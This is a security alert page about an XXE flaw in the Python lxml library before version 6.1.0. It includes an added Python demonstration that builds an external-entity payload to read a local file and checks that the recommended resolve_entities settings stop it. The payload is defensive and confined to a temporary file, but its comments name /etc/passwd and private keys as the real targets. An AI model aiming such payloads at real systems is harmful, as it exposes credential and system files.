Perceptive Security
SOC/SIEM Consultancy

lxml is a library for processing XML and HTML in the Python language. Prior to 6.1.0, using either of the two parsers in the default configuration (with resolve…
Published:
23 April 2026 at 22:00:00
Alert date:
24 April 2026 at 19:03:24
Source:
nvd.nist.gov
Supply Chain & Dependencies, Web Technologies
lxml, a Python library for processing XML and HTML, contains a vulnerability prior to version 6.1.0 that allows local file access through XML external entity (XXE) resolution. With either of lxml's two parsers in their default configuration (resolve_entities=True), untrusted XML input can declare an external entity that points at a local file and have that file's contents substituted into the parsed document. Users who cannot upgrade can mitigate by constructing their parser with resolve_entities set to 'internal' (a value accepted since lxml 5.0, which expands entities declared inside the document but never loads external ones) or to False. The issue is fixed in lxml version 6.1.0.
Technical details
Mitigation steps:
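Added example, not code from the advisory, NVD or the lxml project: it reproduces the local file read described above against lxml's default parser and checks that the two recommended resolve_entities settings stop it. It assumes lxml is installed and a POSIX path layout; the secret file, both XML payloads and the helper names (malicious_payload, parse_text, hardened_options, run_demo) are constructed for the demonstration.

```python
import os
import tempfile

from lxml import etree

# Added example, not code from the advisory or the lxml project. Assumes lxml is
# installed and a POSIX path layout (file:///...). The secret file, payloads and
# helper names below are constructed for the demonstration.

LXML_VERSION = etree.LXML_VERSION        # e.g. (5, 3, 0, 0); the fix ships in 6.1.0
SECRET = "s3cr3t-token-do-not-leak"      # stand-in for /etc/passwd or a private key

# Benign document: one internal entity, nothing external. Used to show that
# resolve_entities='internal' still expands these while False leaves them alone.
BENIGN = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE doc [ <!ENTITY greeting "hello"> ]>\n'
    b"<doc><a>&greeting;</a></doc>"
)


def malicious_payload(path: str) -> bytes:
    """Classic XXE payload: an external general entity pointing at a local file,
    referenced from element content so the file's bytes land in the parsed tree."""
    uri = "file://" + path                 # absolute POSIX path -> file:///...
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE doc [ <!ENTITY leak SYSTEM "' + uri.encode() + b'"> ]>\n'
        b"<doc><secret>&leak;</secret></doc>"
    )


def parse_text(payload: bytes, **parser_opts) -> dict:
    """Parse with the given XMLParser options; return {tag: text} for the root's
    children. An unexpanded entity reference leaves .text empty, because lxml keeps
    it as a child Entity node instead of substituting its value. A parser that
    refuses the document is reported as {'error': ...} rather than raised: for the
    hardened settings, refusing and not expanding are both acceptable outcomes."""
    parser = etree.XMLParser(**parser_opts)
    try:
        root = etree.fromstring(payload, parser)
    except etree.XMLSyntaxError as exc:
        return {"error": str(exc)}
    return {el.tag: el.text or "" for el in root}


def leaked(result: dict) -> bool:
    """True if the secret file's content appears anywhere in a parse result."""
    return any(SECRET in str(v) for v in result.values())


def hardened_options() -> dict:
    """Parser options the advisory recommends for untrusted input. 'internal'
    (expand internal entities, never load external ones) is understood from
    lxml 5.0 on; on older releases a string is merely truthy, i.e. the same as
    True, so fall back to False there instead of silently staying vulnerable."""
    if LXML_VERSION >= (5, 0):
        return {"resolve_entities": "internal"}
    return {"resolve_entities": False}


def run_demo() -> dict:
    """Write the secret, parse both documents under three settings, clean up."""
    fd, path = tempfile.mkstemp(prefix="lxml-xxe-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(SECRET)
    try:
        evil = malicious_payload(path)
        settings = {
            "default": {},                            # resolve_entities=True before 6.1.0
            "no_entities": {"resolve_entities": False},
            "hardened": hardened_options(),
        }
        return {
            name: {"malicious": parse_text(evil, **opts), "benign": parse_text(BENIGN, **opts)}
            for name, opts in settings.items()
        }
    finally:
        os.remove(path)


if __name__ == "__main__":
    for name, r in run_demo().items():
        print(f"{name:12s} leaked={leaked(r['malicious'])!s:5s} "
              f"malicious={r['malicious']} benign={r['benign']}")
```

Run it directly to print one line per setting. On lxml releases before the fix, the default parser returns the file's content as the text of `<secret>`; resolve_entities=False leaves every entity reference unexpanded (the benign document's `<a>` comes back empty too), while 'internal' still expands the entity declared in the document but never loads the external one. The version guard in hardened_options matters in practice: on lxml 4.x the string 'internal' is treated as a truthy value and the parser stays vulnerable, so on those releases the only safe setting is False or an upgrade.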
Affected products:
lxml
Related links:
https://nvd.nist.gov/vuln/detail/CVE-2026-41066
https://bugs.launchpad.net/lxml/+bug/2146291
https://github.com/lxml/lxml/security/advisories/GHSA-vfmq-68hx-4jfw
Related CVEs:
Related threat actors:
IOCs:
This article was created with the assistance of AI technology by Perceptive.
